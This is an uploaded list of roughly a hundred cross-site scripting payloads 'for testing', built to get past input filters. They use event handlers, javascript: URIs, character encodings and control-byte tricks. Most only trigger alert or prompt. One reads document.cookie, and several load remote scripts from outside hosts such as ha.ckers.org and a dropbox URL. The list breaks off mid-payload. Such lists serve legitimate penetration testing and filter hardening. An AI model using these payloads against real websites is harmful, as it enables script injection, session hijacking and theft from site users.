
Short List of XSS Scripts For Testing

This document contains a list of XSS (cross-site scripting) scripts that can be used for testing purposes. Many of the scripts insert JavaScript code, such as alert(1) or prompt(1), into elements like <svg>, <script>, <iframe>, and <img> tags in ways that bypass input filtering. The goal is to find ways of executing JavaScript on a page by exploiting vulnerabilities such as DOM-based XSS.

Uploaded by Bala

Short List of XSS Scripts for Testing:

<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>

<svg onload=eval(location.hash.slice(1)>#alert(1)

<svg onload=innerHTML=location.hash>#<script>alert(1)</script>

<button ' onclick=alert(1)//>*/alert(1)//

<html ontouchstart=alert(1)>

<html ontouchend=alert(1)>

<script>alert(1)</script>

<script src=javascript:alert(1)>

<script>alert(1)//

<script>alert(1)<!--

<x onclick=alert(1)>click this!

<x oncopy=alert(1)>copy this!

<x onmousemove=alert(1)>hover this!

<x onmouseout=alert(1)>hover this!

<body onhelp=alert(1)>press F1! (MSIE)

<body onscroll=alert(1)>

<svg onload=alert`1`>

<svg onload=alert&lpar;1&rpar;>

"onmouseover=alert(1)//

"autofocus/onfocus=alert(1)//

<img src="x:ö" title="onerror=alert(1)//">

<img src="x:? title=" onerror=alert(1)//">

<IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))">

<IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))">

<IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))">

<IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))">

<IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))">

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>

/|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\

</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>

<script x> alert(1) </script 1=2

<div/onmouseover='alert(1)'> style="x:">

<--`<img/src=` onerror=alert(1)> --!>

<script>javascript:alert(1)</script\x0D

<script>javascript:alert(1)</script\x0A

<script>javascript:alert(1)</script\x0B

<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>

'`"><\x3Cscript>javascript:alert(1)</script>

'`"><\x00script>javascript:alert(1)</script>

ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF

ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF

<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>

`"'><img src=xxx:x \x09onerror=javascript:alert(1)>

`"'><img src=xxx:x \x0Conerror=javascript:alert(1)>

<script\x0D>javascript:alert(1)</script>

<script\x0A>javascript:alert(1)</script>

<? foo="><script>javascript:alert(1)</script>">

<! foo="><script>javascript:alert(1)</script>">

<img \x00src=x onerror="javascript:alert(1)">

<img src\x09=x onerror="javascript:alert(1)">

<!--[if]><script>javascript:alert(1)</script -->

<!--[if<img src=x onerror=javascript:alert(1)//]> -->

<IMG SRC="javascript:javascript:alert(1);">

<IMG SRC=javascript:javascript:alert(1)>
<IMG SRC=&{javascript:alert(1);};>

<a href="jav&#65ascript:javascript:alert(1)">test1</a>

<a href="jav&#97ascript:javascript:alert(1)">test1</a>

<IMG SRC="jav&#x09;ascript:alert('XSS');">

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>

<iframe/src \/\/onload = prompt(1)

<iframe/onreadystatechange=alert(1)

<img src ?itworksonchrome?\/onerror = alert(1)

<svg><script>//&NewLine;confirm(1);</script </svg>

'';!--"<XSS>=&{()}

'>//\\,<'>">">"*"

'); alert('XSS

//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));

>"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>

&lt;IMG SRC=JaVaScRiPt:alert(&apos;XSS&apos;)&gt;

&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;

&lt;SCRIPT SRC=http://ha.ckers.org/xss.js

&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;

<;IMG DYNSRC=";javascript:alert(';XSS';);";>;

<;IMG LOWSRC=";javascript:alert(';XSS';);";>;

<IMG SRC="javascript:alert('XSS')"

<iframe src=http://ha.ckers.org/scriptlet.html <

<<SCRIPT>alert("XSS");//<</SCRIPT>

"};alert(23);a={"a":

"x:expr/**/ession(alert(1))"

`"'><img src=xxx:x \x27onerror=javascript:alert(1)>

`"'><img src=xxx:x \x20onerror=javascript:alert(1)>


"`'><script>\x3Bjavascript:alert(1)</script>

<DIV STYLE="background-image: url(javascript:javascript:alert(1))">

<DIV STYLE="width:expression(javascript:alert(1));">

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<BODY BACKGROUND="javascript:alert('XSS')">

<IMG DYNSRC="javascript:alert('XSS')">

<IMG LOWSRC="javascript:alert('XSS')">

<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab
